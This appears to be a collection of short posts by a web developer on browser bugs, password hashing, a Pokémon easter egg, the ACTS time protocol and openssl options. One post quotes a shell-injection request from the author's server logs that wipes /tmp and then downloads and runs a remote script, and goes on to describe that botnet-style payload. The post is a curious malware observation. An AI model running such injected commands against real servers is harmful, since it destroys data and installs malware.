[me, doing Web development] Hmm I wonder why the graph legend shows up in Firefox 120 and Safari but not at all in Firefox 115, let’s look at the layout data… oh

I stumbled upon the JSLint GitHub page and was looking through it when I saw this:

What. happened. here.

Update: deployed to production on an older ARM SBC that happens to be much slower than my desktop. Logins take several seconds. Guess what was the culprit?

I was wondering why the test suite that I’m writing for a Python web framework took so long to execute, and the profiler revealed that nearly all the time was taken by… the _hashlib.pbkdf2_hmac function. Sigh

(The purpose of this function to hash passwords so they can be securely stored in a database, and to take time executing so the hashing cannot easily be reversed)

That reminds me of something I found in Pokémon Sword/Shield four years ago: on the 29th of February, the entire Wild Area will have foggy weather. The weather pattern is different for each day of the year (repeats each year), and is never that uniform for any other day AFAIK.

Nice little Easter Egg from the developers. “Yeah, we remembered that February 29th exists and did something about it. Now go catch a Milotic or something”.

So I wrote a Python script to simulate a modem successfully connecting to a time server that sends ACTS¹ time data.

And it works! (not sure why the video doesn’t embed)

http://drop.duvert.net/atomicclock/atomicclock.mp4

I quite like the DATE/TIME SYNCHRONIZED text when synchronization completes. Pretty satisfying.

Also it’s not too surprising for a program released in 1995, but Atomic Clock handles Y2K correctly. The ACTS protocol sends the date with a two-digit year, but also sends the number of days since November 17, 1858 (MJD, “Modified Julian Date”). Atomic Clock uses the MJD only; I was able to synchronize the clock to 02/03/1980 and to 02/03/2080 without issues. (I had to pick dates between 1980 and 2099 since Windows 98 apparently does not allow setting dates outside this range).

In any case, I like the efforts they made to make a clock synchronization software look interesting. It has a lot of more or less useful options (including one to add the current time in the title bar of currently active window, which scares me)

1. I figured out which protocol the program was using by searching the phone number of the NIST time service. I also found this paper with a full dump of the protocol, which was pretty useful.

99999997. not only this requires the browser to know how to count
99999998. in multiple writing systems,
99999999. since you can specify a start point with the start attribute
100000000. it needs to support formatting large values like one billion

I was looking though my webserver logs and saw this:

GET /bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://redacted/l.sh;${IFS}sh${IFS}l.sh;

Okay, I guess it’s trying to exploit some extremely straightforward shell
injection in a web server. Fair enough. But I got curious: what does this l.sh
payload does?

Well, I downloaded it. It:

• Force-removes /tmp/ and /var/log
• Tries to cd into various directories (including /tmp/ that it just deleted)
• Tries to run a payload from the Web, first by doing expl <URL> (I guess that
  only works on an already infected system), and falling back to downloading the
  payload URL with curl, renaming it (with cat src > dest for some reason),
  chmoding it, and finally executing it.
• Runs iptables -F which drops iptables rules (but keeps the default policy
  active IIRC, so if you have a firewall configured, at this point all input,
  and possibly output traffic will be blocked)
• Adds a couple of iptables rules to block input traffic on some random ports
• Runs iptable-save without option, which does not save anything but prints
  the current iptables rules.

So all of this is pretty weird, but the weirdest part is the payload. It
actually tries to run multiple payloads, each with a different architecture, in
the following order:

• i486
• i686
• x86
• mips
• mpsl
• arm4
• arm5
• arm6
• arm7
• ppc
• m68k
• sh4
• x86_64

… MIPS ? 68000 ? SH-4 ? Really ? Yes, really. I downloaded most of them, and
file confirms that they are executables for the corresponding architectures.
(I didn’t investigate further.)

So I guess the morale of this story is: Don’t rely on the fact that you’re
running Linux on weird old hardware (like, say, a 90s Pocket PC or a Dreamcast)
to save you from malware :)

Am I the only one who took a couple years to realize that the -inform option of openssl x509 means INput FORMat and has nothing to do with information, and that the -nodes option of openssl req means “no DES” (aka no DES encryption of the private key) and has nothing to do with nodes?

We’re in 2023, and looking at a the replies to a recent tweet by @0xabad1dea, it seems many people think that the 32-bit Windows runtime 1) doesn't use any memory when running and 2) will be installed by default forever. Sigh.